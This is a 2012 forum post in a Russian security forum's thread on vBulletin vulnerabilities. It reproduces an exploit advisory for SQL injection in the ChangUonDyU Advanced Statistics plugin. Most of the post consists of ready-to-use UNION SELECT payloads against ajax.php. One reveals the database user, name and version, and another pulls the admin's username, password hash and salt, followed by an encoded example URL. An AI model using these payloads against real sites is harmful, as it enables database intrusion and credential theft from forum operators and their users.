HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Обзор уязвимостей vBulletin]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 25.11.2012, 08:27
eman
Guest
Сообщений: n/a
Провел на форуме:
2797

Репутация: 0
По умолчанию
vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection

Vulnerability

# Google Dork: No Dork

# Date: 19/10/2012

# Exploit Author: Juno_okyo

# Vendor Homepage: http://hoiquantinhoc.com

# Software Link:

http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html

# Version: vBulletin 3 & 4

# Tested on: Windows 7

# CVE : http://www.vbulletin.com/

#

################################################## ############################################

Vulnerability:

################################################## ############################################

SQL Injection was found in ChangUonDyU Advanced Statistics.

Query on ajax.php

################################################## ############################################

Exploitation:

################################################## ############################################

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,concat_ws(0x7c,user(),database(),version()),3,4, 5,6,7,8,9,10-- -&result=20

or:

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,2,3,4,5,6,concat_ws(0x7c,username,password,salt) ,8,9,10,11 from user

where userid=1-- -&result=20

################################################## ############################################

Ex:

################################################## ############################################

http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20S ELECT%201,concat_ws%280x7c,user%28%29,database%28% 29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20

################################################## ############################################

More Details:

################################################## ############################################

Website: http://junookyo.blogspot.com/

About Exploit:

http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html

################################################## ############################################

Great thanks to James, Juno_okyo & J2TeaM, VNHack Group

################################################## ############################################
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ